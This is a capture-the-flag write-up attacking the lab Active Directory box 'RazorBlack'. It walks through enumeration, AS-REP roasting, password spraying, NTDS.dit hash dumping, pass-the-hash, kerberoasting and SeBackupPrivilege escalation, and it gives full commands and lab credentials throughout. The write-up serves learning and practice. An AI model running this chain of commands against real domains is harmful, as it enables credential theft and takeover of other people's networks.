Kariebi Victor

Active Directory, Pass the Hash Attack,

RazorBlack Reconnaissance with Nmap nmap -p 53,88,111,135,139,389,445,464,593,636,2049,3268,3269,3389,5985,9389,49664,49665,49667,49669,49670,49672,49673,49692,49704,4983 1 -sCV -oN map.txt- Nmap scan report for- Host is up (0.19s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time:-:59:02Z) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version | 100000 2,3,4 port/proto 111/tcp service rpcbind | 100000 2,3,4 111/tcp6 rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 2,3,4 111/udp6 rpcbind | 100003 2,3 2049/udp nfs | 100003 2,3 2049/udp6 nfs | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100005 1,2,3 2049/tcp mountd | 100005 1,2,3 2049/tcp6 mountd | 100005 1,2,3 2049/udp mountd | 100005 1,2,3 2049/udp6 mountd | 100021 1,2,3,4 2049/tcp nlockmgr | 100021 1,2,3,4 2049/tcp6 nlockmgr | 100021 1,2,3,4 2049/udp nlockmgr | 100021 1,2,3,4 2049/udp6 nlockmgr | 100024 1 2049/tcp status | 100024 1 2049/tcp6 status | 100024 1 2049/udp status |_ 100024 1 2049/udp6 status 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http 636/tcp open tcpwrapped 2049/tcp open nlockmgr 1-4 (RPC #100021) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services Microsoft Windows RPC over HTTP 1.0 | rdp-ntlm-info: | Target_Name: RAZ0RBLACK | NetBIOS_Domain_Name: RAZ0RBLACK | NetBIOS_Computer_Name: HAVEN-DC | DNS_Domain_Name: raz0rblack.thm | DNS_Computer_Name: HAVEN-DC.raz0rblack.thm | Product_Version:- |_ System_Time:-T13:00:00+00:00 |_ssl-date:-T13:00:09+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=HAVEN-DC.raz0rblack.thm | Not valid before:-T12:50:45 |_Not valid after: 5985/tcp open -T12:50:45 http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp mc-nmf .NET Message Framing 49664/tcp open open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49672/tcp open msrpc Microsoft Windows RPC 49673/tcp open msrpc Microsoft Windows RPC 49692/tcp open msrpc Microsoft Windows RPC 49704/tcp open msrpc Microsoft Windows RPC 49831/tcp open msrpc Microsoft Windows RPC Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date:-T13:00:03 |_ start_date: N/A | smb2-security-mode: | |_ 3:1:1: Message signing enabled and required |_clock-skew: mean: -1s, deviation: 0s, median: -1s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Jul 26 14:01:54 2023 -- 1 IP address (1 host up) scanned in 179.97 seconds Service Enumeration [+] Port 139/445[SMB] Version: null Public Exploit: - Using Crackmapexec to enumerate - Blank Authentication > crackmapexec smb -u '' -p '' --shares - Using smbclient to enumerate - Blank Authentication > smbclient -L -U "" //IP/ - Shows we cannot access the share but displays some usefull information like the name of the domain. - raz0rblack.thm [+] Port 135[RPC] Version: Microsoft Windows RPC Public Exploit: - Using rpclient to enumerate - Blank Authentication: because we currently don't have credentials > rpcclient -U "" -N- - Got NT_STATUS_LOGON_FAILURE [+] Port 389[LDAP] Version: Microsoft Windows Active Directory LDAP Public Exploit: - Using ldapsearch to enumerate - Checking the naming contexts > ldapsearch -x -H ldap:// -s base namingcontexts - Using naming contexts to get information from the DC > ldapsearch -x -H ldap:// -s sub "DC=raz0rblack,DC=thm" - Using ldapdomaindump to enumerate > ldapdomaindump -n -m HAVEN-DC - both enumeration didn't result in anything [+] Port 2049[NFS] Version: Public Exploit: - Using showmount to enumerate NFS shares > showmount -e - Create a mount location > mkdir /tmp/users - Mounting the share /user > sudo mount -t nfs :/users /tmp/users -o nolock - Navigate to the mount directory - Open the file `employee_status.xlsx` with LibreOffice, we got the following information daven port imogen royce tamara vidal arthur edwards carl ingram nolan cassidy reza zaydan ljudmila vetrova rico delgado tyson williams steven bradley chamber lin - Using a tool like ADGenerator.py, we can change the names format from full name to AD usernames. [+] Port 88[kerberos] Version: Public Exploit: - After gettng usernames, we can use kerbrute to validate these usernames > kerbrute userenum -d raz0rblack.thm --dc username.txt [+] AS-REP Roasting - Now using Impacket-GetNPUsers.py we can check for users with No-Preauthentication set to true > Get-NPUsers.py / -dc-ip -no-pass -userfile - We get the kerberos hash of the user twilliams and can use john to crack it. > john --wordlist=/ hash.txt twilliams:roastpotatoes [+] Password Spraying with kerbrute - Using Kerbrute to check for users with the same password > kerbrute passwordspray --dc -d raz0rblack.thm users.txt 'roastpotatoes' - We discover that sbradley has the same password as twilliams - Using crackmapexec to validate the password, we see that the password has expired Initial Foothold [+] Password Spraying with kerbrute - Using Kerbrute to check for users with the same password > kerbrute passwordspray --dc -d raz0rblack.thm users.txt 'roastpotatoes' - We discover that sbradley has the same password as twilliams - Using crackmapexec to validate the password, we see that the password has expired [+] Password Reset with impacket-smbpasswd - We can change sbradley's password with this tool > impacket-smbpasswd sbradley@ - password was changed to 'whatshell' [+] SMB Enumeration with Credentials With valid credentials now, we can do an Authenticated enumeration on the SMB server. - Using smbmap to enumerate > smbmap -H -u 'sbradley' -p 'whatshell' -R - Under the trash share, we find a couple of files. - chat_log_-.txt - sbradley.txt - experiment_gone_wrong.zip - Reading the content of the log file, we find an interesting conversation between sbradley and the Administrator. I happens that the NTDS.dit and SYSTEM.hive files are both in the password protected file. [+] Zip Password Cracking Using a tool like zip2john, we can convert the zip file to a hash format that johntheripper can crack. - Convert the zip file to johntheripper compatible hash > zip2john experiment_gone_wrong.zip > hash.txt - Crack with john > john --wordlist=/rockyou.txt hash.txt #password: electromagnetismo [+] Dumping Hashes We currently have the NTDS.dit file and the system.hive file. With both files, we can dump all users and their hash on the Domain. - Using impacket-secretsdump > impacket-secretsdump -ntds -system LOCAL - With this we successfully dump a long list of usernames and hash [+] Pass the Hash Attack Perfoming a Pass-the-Hash attack on the valid usernames we have using the dumped hashes - First you need to trim the hash to exclude the username and LM hash > cat hash.dump | cut -d':' -f'4' | sed '/^$/d' > hash.full - Using crackmapexec to perform a pass-the-hash attack > crackmapexec smb -u username.txt -H hash.txt --continue-on-success lvetrova:f220d3988deb3f516c73f40ee16c431d [+] Evil-winrm With the NTLM hash discoverd, we can get a shell as user lvetrova using Evil-winrm > evil-winrm -i -u lvetrova -H f220d3988deb3f516c73f40ee16c431d Post Exploitation [+] Powershell Credentials - Navigating to C:\Users\lvetrova we find an xml file that contains a flag stored as a securestring - We can follow the following methods to retrieve the cleartext from the .xml file - First method. Using Clixml > $credential = Import-Clixml -Path "lvetrova.xml" > $credential.GetNetworkCredential().password - Second method. > $pw = "" | ConvertTo-SecureString > $cred = New-Object System.Management.Automation.PSCredential("lvetrova", $pw) > $cred.GetNetworkCredential() | fl [+] Lateral Movement Enumerating the machine for possible kerberoastable accounts - The user `xyan1d3` is an SPN - Using impacket-GetUserSPNs > impacket-GetUserSPNs -request -dc-ip / -hashes - We got the TGS from the DC and can use john-the-ripper to extract the SPN's password from this > john wordlist=/rockyou.txt krbtgs.hash `cyanide9amine5628` - Using the curently discoverd password we can login as user `xyan1d3` using evil-winrm > evilwinrm -i -u xyan1d3 -p cyanide9amine5628 [+] Privilege Escalation - Running the `whoami /priv` command on xyan1d3, shows we have some interesting privileges - SeBackupPrivilege: Can be used to back up files and directories - Create a directory and copy the sam and system to this directory > mkdir c:\temp > reg save hklm\sam c:\temp\sam > reg save hklm\system c:\temp\system - Move both files over to you attack machine and dump the hash - Dumping the hash with pypykatz > pypykatz registry --sam sam system - From the dump we can use the Adminsttrator hash to perform a pass-the-hash attack with evil-winrm > evil-winrm -i -u Adminstrator -H-bed40ca5a2ce-f0c [+] nt authoity / system https://juggernaut-sec.com/sebackupprivilege/ https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/ https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960

Scheduled maintenance